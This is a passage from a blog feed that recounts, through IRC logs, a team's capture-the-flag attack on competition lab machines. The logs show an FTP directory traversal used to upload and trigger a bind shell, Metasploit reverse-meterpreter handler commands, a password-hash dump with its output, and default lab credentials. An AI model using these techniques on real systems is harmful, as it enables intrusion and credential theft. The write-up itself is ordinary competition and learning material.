/&gt;[23:32] &lt;@Lincoln&gt; 200 PORT command successful.&lt;br /&gt;[23:32] &lt;@Lincoln&gt; 150 Opening ASCII mode data connection for listing&lt;br /&gt;[23:32] &lt;@Lincoln&gt; dr-xrwx--- 1 admin users              0 May 07 23:49 My Music&lt;br /&gt;[23:32] &lt;@Lincoln&gt; dr-xrwx--- 1 admin users              0 May 07 23:49 My Pictures&lt;br /&gt;[23:32] &lt;@Lincoln&gt; dr-xrwx--- 1 admin users              0 May 07 23:49 My Videos&lt;br /&gt;[23:32] &lt;@Lincoln&gt; dr-xrwx--- 1 admin users              0 May 08 00:03 test&lt;br /&gt;[23:32] &lt;@Lincoln&gt; 226 Transfer complete.&lt;br /&gt;[23:32] &lt;@Sud0&gt; shit&lt;br /&gt;[23:32] &lt;@Lincoln&gt; ftp&gt; cd \..\..\&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Lincoln explained us the problem, TecR0c finished it with a nice phrase &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[23:35] &lt;@Sud0&gt; devil&lt;br /&gt;[23:35] &lt;@_sinn3r&gt; I still can't get noobSeccret.txt.......... the damn thing just times out.&lt;br /&gt;[23:35] &lt;@Sud0&gt; what pass ?&lt;br /&gt;[23:35] &lt;@Lincoln&gt; killthen00b&lt;br /&gt;[23:35] &lt;@chap0&gt; I mentioned it earlier but&lt;br /&gt;[23:35] &lt;@chap0&gt; hahaha&lt;br /&gt;[23:35] &lt;@chap0&gt; it was on the page they said to read the whole page&lt;br /&gt;[23:35] &lt;@chap0&gt; haha&lt;br /&gt;[23:35] &lt;@chap0&gt; :D&lt;br /&gt;[23:35] &lt;@chap0&gt; anyway good going linc for bringing it to the light!&lt;br /&gt;[23:35] &lt;@_sinn3r&gt; "Gateway Time-out&lt;br /&gt;[23:35] &lt;@_sinn3r&gt; The gateway did not receive a timely response from the upstream server or application."&lt;br /&gt;[23:36] &lt;@Sud0&gt; nice lol&lt;br /&gt;[23:36] &lt;@Sud0&gt; where on the websitre Lincoln lol&lt;br /&gt;[23:36] &lt;@Lincoln&gt; FTP Credentials are : devil / killthen00b&lt;br /&gt;[23:36] &lt;@Lincoln&gt; under helpful hints on the bottom&lt;br /&gt;[23:36] &lt;@Lincoln&gt; of info blog&lt;br /&gt;[23:36] &lt;@Sud0&gt; hahahahaha&lt;br /&gt;[23:37] &lt;@Sud0&gt; i'm so umb&lt;br /&gt;[23:37] &lt;@Sud0&gt; i dumb&lt;br /&gt;[23:37] &lt;@Sud0&gt; lol&lt;br /&gt;[23:37] &lt;@TecR0c&gt; WTF&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;After a team work we discovered the default exe folder of surgemail to put our backdoor &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[00:11] &lt;@Lincoln&gt; try cd /MyDocuments/....../....../....../..../....../surgemail/web&lt;br /&gt;[00:11] &lt;@TecR0c&gt; 07 23:52:18.13:1876: IMAP 3.8k4-4, User connected (192.168.6.143) (192.168.6.71) socket=1588&lt;br /&gt;[00:11] &lt;@TecR0c&gt; ok so the peolpe who have owned it must have to use imap aswell&lt;br /&gt;[00:11] &lt;@TecR0c&gt; ;/&lt;br /&gt;[00:17] &lt;@Sud0&gt; CGI did not respond correctly, it probably exited abnormally or the file may not exist or have +x access (bind.exe) ()&lt;br /&gt;[00:18] &lt;@Sud0&gt; http://192.168.6.71/scripts/bind.exe&lt;br /&gt;[00:21] &lt;@mr_me&gt; hey sudo&lt;br /&gt;[00:21] &lt;@mr_me&gt; u have web root&lt;br /&gt;[00:21] &lt;@mr_me&gt; ?&lt;br /&gt;[00:22] &lt;@_sinn3r&gt; you think 192.168.6.72 supports ASP?&lt;br /&gt;[00:22] &lt;@_sinn3r&gt; server: DManager........&lt;br /&gt;[00:23] &lt;@_sinn3r&gt; nnnnnoope...&lt;br /&gt;[00:23] &lt;@Sud0&gt; hum&lt;br /&gt;[00:23] &lt;@Sud0&gt; yes&lt;br /&gt;[00:23] &lt;@Sud0&gt; shit&lt;br /&gt;[00:23] &lt;@Sud0&gt; but&lt;br /&gt;[00:23] &lt;@Sud0&gt; i loaded&lt;br /&gt;[00:23] &lt;@Sud0&gt; the exe&lt;br /&gt;[00:23] &lt;@Sud0&gt; bind.exe&lt;br /&gt;[00:23] &lt;@Lincoln&gt; yeah i missed that one lol&lt;br /&gt;[00:23] &lt;@Sud0&gt;  http://192.168.6.71/scripts/bind.exe&lt;br /&gt;[00:23] &lt;@Lincoln&gt; http://192.168.6.72/evil.html&lt;br /&gt;[00:23] &lt;@Sud0&gt;  http://192.168.6.71/scripts/bind.exe&lt;br /&gt;[00:24] &lt;@_sinn3r&gt; bindshell for what port?&lt;br /&gt;[00:24] &lt;@Sud0&gt; 4444&lt;br /&gt;&lt;br /&gt;09/05/2010 :&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;A new day and corelanc0d3r started thinking about new technologies and doing what he loves best : writing nice articles and blogs&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[00:31] &lt;@corelanc0d3r&gt; trying some stuff&lt;br /&gt;[00:31] &lt;@corelanc0d3r&gt; but&lt;br /&gt;[00:31] &lt;@corelanc0d3r&gt; perhaps this may help&lt;br /&gt;[00:31] &lt;@corelanc0d3r&gt; go to the admin page of surgemail&lt;br /&gt;[00:31] &lt;@corelanc0d3r&gt; log in with admin account&lt;br /&gt;[00:31] &lt;@corelanc0d3r&gt; corelanc0d3r&lt;br /&gt;[00:31] &lt;@corelanc0d3r&gt; password&lt;br /&gt;[00:31] &lt;@corelanc0d3r&gt; admimn&lt;br /&gt;[00:31] &lt;@corelanc0d3r&gt; admin&lt;br /&gt;[00:31] &lt;@corelanc0d3r&gt; you can create blogs&lt;br /&gt;[00:32] &lt;@corelanc0d3r&gt; maybe we can do something with this&lt;br /&gt;&lt;br /&gt;[00:33] &lt;@corelanc0d3r&gt; http://192.168.6.70/blogs/corelanc0d3r&lt;br /&gt;[00:34] &lt;@corelanc0d3r&gt; hahaha&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;After That Lincoln gave us a nice shell :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[00:46] &lt;@Lincoln&gt; CAN YOU SAY WOOT&lt;br /&gt;[00:46] &lt;@Lincoln&gt; msf exploit(mhandler) &gt; exploit&lt;br /&gt;[00:46] &lt;@Lincoln&gt; [*] Started reverse handler on 192.168.6.135:4444&lt;br /&gt;[00:46] &lt;@Lincoln&gt; [*] Starting the payload handler...&lt;br /&gt;[00:46] &lt;@Lincoln&gt; [*] Sending stage (748032 bytes) to 192.168.6.135&lt;br /&gt;[00:46] &lt;@Lincoln&gt; [*] Meterpreter session 1 opened (192.168.6.135:4444 -&gt; 192.168.6.135:44382)&lt;br /&gt;[00:46] &lt;@_sinn3r&gt; whoa, how?&lt;br /&gt;[00:46] &lt;@corelanc0d3r&gt; wtf&lt;br /&gt;[00:46] &lt;@corelanc0d3r&gt; :D&lt;br /&gt;[00:46] &lt;@_sinn3r&gt; how?&lt;br /&gt;[00:47] &lt;@TecR0c&gt; wtf&lt;br /&gt;[00:47] &lt;@TecR0c&gt; ohyeeeeee&lt;br /&gt;[00:47] &lt;@mr_me&gt; fukn hell&lt;br /&gt;[00:47] &lt;@TecR0c&gt; your the man&lt;br /&gt;[00:47] &lt;@TecR0c&gt; =]&lt;br /&gt;[00:47] &lt;@_sinn3r&gt; how how how how how&lt;br /&gt;[00:47] &lt;@chap0&gt; lol&lt;br /&gt;[00:47] &lt;@mr_me&gt; WOW&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;But it was not as nice as it looks like :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[00:48] &lt;@Lincoln&gt; ignore it guys&lt;br /&gt;[00:48] &lt;@Lincoln&gt; no&lt;br /&gt;[00:48] &lt;@Lincoln&gt; no&lt;br /&gt;[00:48] &lt;@Lincoln&gt; i fucked up&lt;br /&gt;[00:48] &lt;@Lincoln&gt; hahahaha&lt;br /&gt;[00:48] &lt;@corelanc0d3r&gt; not worky ?&lt;br /&gt;[00:48] &lt;@Sud0&gt; hahaha&lt;br /&gt;[00:48] &lt;@Sud0&gt; :)&lt;br /&gt;[00:48] &lt;@Lincoln&gt; no....&lt;br /&gt;[00:48] &lt;@Lincoln&gt; too stupid to admit&lt;br /&gt;[00:48] &lt;@Lincoln&gt; sorry guys ignore&lt;br /&gt;[00:48] &lt;@Sud0&gt; your own machine&lt;br /&gt;[00:48] &lt;@Sud0&gt; :)&lt;br /&gt;[00:48] &lt;@Lincoln&gt; yep....&lt;br /&gt;[00:48] &lt;@Lincoln&gt; hahahah&lt;br /&gt;[00:48] &lt;@_sinn3r&gt; awwwwwwwwww......&lt;br /&gt;[00:48] &lt;@Lincoln&gt; im sorry&lt;br /&gt;[00:48] &lt;@Lincoln&gt; lol&lt;br /&gt;[00:48] &lt;@_sinn3r&gt; :-)&lt;br /&gt;[00:49] &lt;@Lincoln&gt; &lt;------------- SUPER emabarrased  &lt;span style="font-weight: bold;"&gt;After i was disconnected, with my unsuccessful bind shell, the team continue to work on killthen00b machine (one man can't make a team) there was a shell&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[01:02] &lt;@corelanc0d3r&gt; ok - need a little help here&lt;br /&gt;[01:02] &lt;@corelanc0d3r&gt; how do I set up metasploit&lt;br /&gt;[01:02] &lt;@corelanc0d3r&gt; to listen for a reverse incoming meterpreter session&lt;br /&gt;[01:02] &lt;@corelanc0d3r&gt; on let's say port 5555&lt;br /&gt;[01:02] &lt;@TecR0c&gt; multi/handler&lt;br /&gt;[01:03] &lt;@TecR0c&gt; use multi/handler&lt;br /&gt;[01:03] &lt;@TecR0c&gt; show options&lt;br /&gt;[01:03] &lt;@_sinn3r&gt; ./msfcli multi/handler payload=windows/meterpreter_reverse_tcp lhost=[your ip] lport=5555 E&lt;br /&gt;[01:04] &lt;@corelanc0d3r&gt; failed Payload has not been selected&lt;br /&gt;[01:04] &lt;@_sinn3r&gt; windows/meterpreter/reverse_tcp&lt;br /&gt;[01:06] &lt;@corelanc0d3r&gt; reverting box again ?&lt;br /&gt;[01:06] &lt;@_sinn3r&gt; two more people just got 50 pts......&lt;br /&gt;[01:11] &lt;@corelanc0d3r&gt; bloody hell&lt;br /&gt;[01:11] &lt;@corelanc0d3r&gt; rooted .70&lt;br /&gt;[01:11] &lt;@_sinn3r&gt; how?&lt;br /&gt;[01:11] &lt;@corelanc0d3r&gt; simple&lt;br /&gt;[01:11] &lt;@corelanc0d3r&gt; really simple&lt;br /&gt;[01:11] &lt;@corelanc0d3r&gt; ftp traversal&lt;br /&gt;[01:11] &lt;@corelanc0d3r&gt; go to c:\surgemail\scripts&lt;br /&gt;[01:11] &lt;@corelanc0d3r&gt; upload eveil&lt;br /&gt;[01:11] &lt;@corelanc0d3r&gt; evil exe&lt;br /&gt;[01:11] &lt;@corelanc0d3r&gt; call it from browserr&lt;br /&gt;[01:11] &lt;@corelanc0d3r&gt; done&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Here we are, using meterpreter, one of the glorius warriors opened a remote desktop&lt;br /&gt;&lt;/span&gt;&lt;span&gt;&lt;br /&gt;[01:21] &lt;@_sinn3r&gt; ok mr_me&lt;br /&gt;[01:21] &lt;@_sinn3r&gt; do this&lt;br /&gt;[01:21] &lt;@_sinn3r&gt; rdesktop 192.168.6.70&lt;br /&gt;[01:21] &lt;@_sinn3r&gt; username: sinn3r&lt;br /&gt;[01:21] &lt;@_sinn3r&gt; password: veryphat&lt;br /&gt;[01:21] &lt;@mr_me&gt; woot&lt;br /&gt;[01:21] &lt;@mr_me&gt; shell&lt;br /&gt;[01:22] &lt;@Lincoln&gt; ahh sexy&lt;br /&gt;[01:22] &lt;@Lincoln&gt; meterpreter &gt; run hashdump&lt;br /&gt;[01:22] &lt;@Lincoln&gt; [*] Obtaining the boot key...&lt;br /&gt;[01:22] &lt;@Lincoln&gt; [*] Calculating the hboot key using SYSKEY 8cbc4040791fac141f35cba5f197d50f...&lt;br /&gt;[01:22] &lt;@Lincoln&gt; [*] Obtaining the user list and keys...&lt;br /&gt;[01:22] &lt;@Lincoln&gt; [*] Decrypting user keys...&lt;br /&gt;[01:22] &lt;@Lincoln&gt; [*] Dumping password hashes...&lt;br /&gt;[01:22] &lt;@Lincoln&gt; Administrator:500:aad3b435b51404eeaad3b435b51404ee:07eaa2b600669980aa3268fd8cc3f0e5:::&lt;br /&gt;[01:22] &lt;@Lincoln&gt; Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::&lt;br /&gt;[01:22] &lt;@Lincoln&gt; devil:1001:aad3b435b51404eeaad3b435b51404ee:3cc3bac4b37e26d8208469533c59e2c6:::&lt;br /&gt;[01:22] &lt;@Lincoln&gt; sinn3r:1002:aad3b435b51404eeaad3b435b51404ee:05597a07ce55307b3e6a3bd1a7abe12d:::&lt;br /&gt;[01:22] &lt;@Lincoln&gt; going to run those through offsec cracker&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;And finally they got the beast down&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span&gt;[01:28] &lt;@_sinn3r&gt; I don't see a proof.txt in devil's desktop&lt;br /&gt;[01:28] &lt;@_sinn3r&gt; Peter, what am I supped to look for?&lt;br /&gt;[01:30] &lt;@_sinn3r&gt; ?&lt;br /&gt;[01:30] &lt;@corelanc0d3r&gt; Administrators Desktop&lt;br /&gt;[01:30] &lt;@_sinn3r&gt; ok... damn, just the wrong desktop&lt;br /&gt;[01:30] &lt;@Lincoln&gt; can someone rehit evil.exe&lt;br /&gt;[01:30] &lt;@Lincoln&gt; on .70&lt;br /&gt;[01:30] &lt;@_sinn3r&gt; hit&lt;br /&gt;[01:30] &lt;@Lincoln&gt; thanks&lt;br /&gt;[01:32] &lt;@Lincoln&gt; doh&lt;br /&gt;[01:32] &lt;@Lincoln&gt; no tftp on win7&lt;br /&gt;[01:32] &lt;@Lincoln&gt; thats right&lt;br /&gt;[01:32] &lt;@_sinn3r&gt; you need to manually enable it&lt;br /&gt;[01:32] &lt;@Lincoln&gt; sinner you still on rdp?&lt;br /&gt;[01:32] &lt;@_sinn3r&gt; not anymore.  go ahead.&lt;br /&gt;[01:33] &lt;@_sinn3r&gt; meterpreter &gt; cat proof.txt&lt;br /&gt;[01:33] &lt;@_sinn3r&gt; a61b0c1bf71267289efeecf778b1e51e&lt;br /&gt;[01:34] &lt;@Lincoln&gt; oO rolf&lt;br /&gt;[01:34] &lt;@corelanc0d3r&gt; does anyone know if there is only one proof file per machine ?&lt;br /&gt;[01:34] &lt;@Lincoln&gt; a61b0c1bf71267289efeecf778b1e51e&lt;br /&gt;[01:34] &lt;@Lincoln&gt; k got it&lt;br /&gt;[01:34] &lt;@_sinn3r&gt; woohoo 50 pts&lt;br /&gt;[01:35] &lt;@corelanc0d3r&gt; nicey&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3514334976077913459-8307945922994661498?l=sud0-says.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sud0-says.blogspot.com/feeds/8307945922994661498/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://sud0-says.blogspot.com/2010/05/killing-n00bkiller.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3514334976077913459/posts/default/8307945922994661498'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3514334976077913459/posts/default/8307945922994661498'/><link rel='alternate' type='text/html' href='http://sud0-says.blogspot.com/2010/05/killing-n00bkiller.html' title='CHAPTER 02 : Killing the n00bKiller'/><author><name>Sud0</name><uri>http://www.blogger.com/profile/09090618316098223592</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3514334976077913459.post-4143808092353762339</id><published>2010-05-11T07:02:00.001-07:00</published><updated>2010-05-11T07:31:43.891-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Jumping the n00bfilter'/><title type='text'>CHAPTER 01 : 08-05-2010 --&gt; VS n00bFilter</title><content type='html'>Hey,&lt;br /&gt;Here we are, we have to pass the n00bfilter as we are not n00b :-)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;08/05/2010 ---&gt; there was a little confusion in the beginning about the noob filter&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[16:00] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; none of the filter web page opens :(&lt;br /&gt;&lt;br /&gt;[16:01] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; http://www1.noob-filter.com / http://www2.noob-filter.com&lt;br /&gt;&lt;br /&gt;[16:01] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; not working both of the m:(&lt;br /&gt;&lt;br /&gt;[06[16:01] &lt;~corelanc0d3r&gt; too much traffic ?&lt;br /&gt;&lt;br /&gt;[16:01] &lt;span style="color: rgb(102, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; they are working for me and mr_me&lt;br /&gt;&lt;br /&gt;[16:01] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; maybe yeah&lt;br /&gt;&lt;br /&gt;[16:02] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; nope for me not working :'(&lt;br /&gt;&lt;br /&gt;[16:02] &lt;span style="color: rgb(51, 204, 0);"&gt;&lt;@corelanc0d3r&gt;&lt;/span&gt; @Tec : any luck with the noob filter ?&lt;br /&gt;&lt;br /&gt;[16:02] &lt;span style="color: rgb(102, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; not yet&lt;br /&gt;&lt;br /&gt;[16:03] &lt;span style="color: rgb(102, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; ill let you know&lt;br /&gt;&lt;br /&gt;[16:03] &lt;span style="color: rgb(102, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; if we get passed it&lt;br /&gt;&lt;br /&gt;[16:03] &lt;~corelanc0d3r&gt; k&lt;br /&gt;[16:06] &lt;span style="color: rgb(102, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; hrm&lt;br /&gt;&lt;br /&gt;[16:06] &lt;span style="color: rgb(102, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; seems like noob-filter only works with iexplorer&lt;br /&gt;&lt;br /&gt;[16:07] &lt;span style="color: rgb(51, 204, 0);"&gt;&lt;@corelanc0d3r&gt;&lt;/span&gt; ok what do we need to do ?&lt;br /&gt;&lt;br /&gt;[16:10] &lt;span style="color: rgb(102, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; working with firefox now&lt;br /&gt;&lt;br /&gt;[16:10] &lt;span style="color: rgb(102, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; all good&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;some time later, we got the dot defender key and that's what it looks like (general panic):&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[16:21] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; anyone here ?&lt;br /&gt;&lt;br /&gt;[16:22] &lt;@chap0&gt; yo&lt;br /&gt;&lt;br /&gt;[16:22] &lt;span style="color: rgb(51, 204, 0);"&gt;&lt;@corelanc0d3r&gt;&lt;/span&gt; yo&lt;br /&gt;&lt;br /&gt;[16:22] &lt;span style="color: rgb(51, 204, 0);"&gt;&lt;@corelanc0d3r&gt;&lt;/span&gt; and ?&lt;br /&gt;&lt;br /&gt;[16:23] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; i found&lt;br /&gt;&lt;br /&gt;[16:23] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; http://www1........ /dotdefender&lt;br /&gt;&lt;br /&gt;[16:23] &lt;span style="color: rgb(51, 204, 0);"&gt;&lt;@corelanc0d3r&gt;&lt;/span&gt; yeah&lt;br /&gt;&lt;br /&gt;[16:23] &lt;span style="color: rgb(51, 204, 0);"&gt;&lt;@corelanc0d3r&gt;&lt;/span&gt; I'm trying the exploit for it&lt;br /&gt;&lt;br /&gt;[16:23] &lt;span style="color: rgb(51, 204, 0);"&gt;&lt;@corelanc0d3r&gt;&lt;/span&gt; http://www.exploit-db.com/exploits/10261&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;but with no success at the beginning (mr_me just arrived ):&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[16:24] * mr_me (mr_me@hidden-8B8DC393.lnk.telstra.net) has joined #corelan&lt;br /&gt;&lt;br /&gt;[16:24] * corelanOp sets mode: +o mr_me&lt;br /&gt;&lt;br /&gt;[16:24] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; just tried it&lt;br /&gt;&lt;br /&gt;[16:24] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; whats the exploit&lt;br /&gt;&lt;br /&gt;[16:24] &lt;span style="color: rgb(102, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; does it work ?&lt;br /&gt;&lt;br /&gt;[16:24] &lt;span style="color: rgb(51, 204, 0);"&gt;&lt;@corelanc0d3r&gt;&lt;/span&gt; no&lt;br /&gt;&lt;br /&gt;[16:24] &lt;span style="color: rgb(51, 204, 0);"&gt;&lt;@corelanc0d3r&gt;&lt;/span&gt; don't think so&lt;br /&gt;&lt;br /&gt;[16:24] &lt;span style="color: rgb(51, 204, 0);"&gt;&lt;@corelanc0d3r&gt;&lt;/span&gt; any other services on that server ?&lt;br /&gt;&lt;br /&gt;[16:25] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; not working&lt;br /&gt;&lt;br /&gt;[16:25] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; tried it&lt;br /&gt;&lt;br /&gt;[16:25] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; The Site Management application of dotDefender is reachable as a web&lt;br /&gt;&lt;br /&gt;[16:25] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; application (https:site/dotDefender/)&lt;br /&gt;&lt;br /&gt;[16:25] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; on the webserver. After passing the Basic Auth login you can&lt;br /&gt;&lt;br /&gt;[16:25] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; create/delete applications.&lt;br /&gt;&lt;br /&gt;[16:25] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; The mentioned vulnerability is in the 'deletesite' implementation and&lt;br /&gt;&lt;br /&gt;[16:25] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; the 'deletesitename' variable.&lt;br /&gt;&lt;br /&gt;[16:25] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; Insufficient input validation allows an attacker to inject arbitrary commands.&lt;br /&gt;&lt;br /&gt;[16:25] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[16:25] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; we have to pass the basic auth before&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Next Step guetting the authentication credentials (due to excitation, chap0 needed three retries so he could write w00t):&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[16:29] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; we def know the login is admin&lt;br /&gt;&lt;br /&gt;[16:29] &lt;span style="color: rgb(102, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; i can confirm that it is admin aswell&lt;br /&gt;&lt;br /&gt;[16:29] &lt;span style="color: rgb(102, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; password defined previously&lt;br /&gt;&lt;br /&gt;[16:29] &lt;span style="color: rgb(102, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; ;/&lt;br /&gt;&lt;br /&gt;[16:29] &lt;span style="color: rgb(102, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; im looking at the installatoin guide&lt;br /&gt;&lt;br /&gt;[16:29] &lt;span style="color: rgb(51, 204, 0);"&gt;&lt;@corelanc0d3r&gt;&lt;/span&gt; not sure - it's not because the login says it's admin, that it is admin&lt;br /&gt;&lt;br /&gt;[16:29] &lt;span style="color: rgb(51, 204, 0);"&gt;&lt;@corelanc0d3r&gt;&lt;/span&gt; ah ok&lt;br /&gt;&lt;br /&gt;[16:29] &lt;span style="color: rgb(51, 204, 0);"&gt;&lt;@corelanc0d3r&gt;&lt;/span&gt; what is the default pass ?&lt;br /&gt;&lt;br /&gt;[16:29] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; looking for it atm&lt;br /&gt;&lt;br /&gt;[16:29] &lt;span style="color: rgb(102, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; doesn't look like there is a default password&lt;br /&gt;&lt;br /&gt;[16:29] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; found it guys&lt;br /&gt;&lt;br /&gt;[16:29] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; we have noob1&lt;br /&gt;&lt;br /&gt;[16:29] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; :d&lt;br /&gt;&lt;br /&gt;[16:30] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; hahahahahahahahahahahahahahahaha&lt;br /&gt;&lt;br /&gt;[16:30] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; guys&lt;br /&gt;&lt;br /&gt;[16:30] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; listen&lt;br /&gt;&lt;br /&gt;[16:30] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; @corelanc0d3r&lt;br /&gt;&lt;br /&gt;[16:30] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; i gotr&lt;br /&gt;&lt;br /&gt;[16:30] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; haha&lt;br /&gt;&lt;br /&gt;[16:30] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; @mr_me&lt;br /&gt;&lt;br /&gt;[16:30] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; i logged in&lt;br /&gt;&lt;br /&gt;[16:30] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; password&lt;br /&gt;&lt;br /&gt;[16:30] &lt;@chap0&gt; all ears big ones&lt;br /&gt;&lt;br /&gt;[16:30] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; hahaha&lt;br /&gt;&lt;br /&gt;[16:30] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; admin/password&lt;br /&gt;&lt;br /&gt;[16:30] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; yeh&lt;br /&gt;&lt;br /&gt;[16:30] &lt;@chap0&gt; W))T!&lt;br /&gt;&lt;br /&gt;[16:30] &lt;@chap0&gt; w001&lt;br /&gt;&lt;br /&gt;[16:30] &lt;@chap0&gt; w00t!&lt;br /&gt;&lt;br /&gt;[16:30] &lt;@chap0&gt; sry&lt;br /&gt;&lt;br /&gt;[16:30] &lt;@chap0&gt; hehehe&lt;br /&gt;&lt;br /&gt;[16:30] &lt;span style="color: rgb(102, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; ah&lt;br /&gt;&lt;br /&gt;[16:30] &lt;span style="color: rgb(102, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; timing out&lt;br /&gt;&lt;br /&gt;[16:30] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; its not root&lt;br /&gt;&lt;br /&gt;[16:30] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; woot nothing&lt;br /&gt;&lt;br /&gt;[16:30] &lt;span style="color: rgb(51, 204, 